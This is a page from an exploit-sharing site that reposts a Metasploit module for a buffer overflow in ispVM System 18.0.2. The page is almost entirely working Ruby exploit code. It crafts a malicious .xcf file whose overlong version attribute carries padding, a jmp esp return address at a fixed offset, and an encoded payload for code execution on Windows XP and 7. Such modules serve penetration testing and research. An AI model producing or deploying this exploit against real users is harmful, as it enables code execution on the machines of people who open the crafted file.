[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ispVM System XCF File Handling Overflow

Author
metasploit
Risk
[
Security Risk High
]
0day-ID
0day-ID-18379
Category
local exploits
Date add
28-05-2012
Platform
windows
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ispVM System XCF File Handling Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in ispVM System 18.0.2.  Due to the way
        ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially
        crafted file, when a long value is supplied for the version attribute of the ispXCF
        tag. It results in arbitrary code execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability Discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '82000'],
          ['BID', '53562'],
          ['URL', 'http://secunia.com/advisories/48740/']
        ],
      'Payload'        =>
        {
          'Space'    => 4000,
          'BadChars' => "\x00\x1a\x3c\x20\x3e\xff"
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 274,
              'BreakOffset' => 243,
              'Ret' => 0x780e9d6e # jmp esp from C:\ispTOOLS\ispvmsystem\MSVCP60.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 16 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.xcf']),
      ], self.class)

  end

  def exploit

    buf = rand_text(target['Offset'])
    buf[target['BreakOffset']] = "A"
    buf << [target.ret].pack("V")
    buf << payload.encoded

    xcf = %Q|
    <?xml version='1.0' encoding='utf-8' ?>
    <!DOCTYPE    ispXCF  SYSTEM  "IspXCF.dtd" >
    <ispXCF version="#{buf}">
    </ispXCF>
    |

    file_create(xcf)
  end
end



#  0day.today [2024-12-25]  #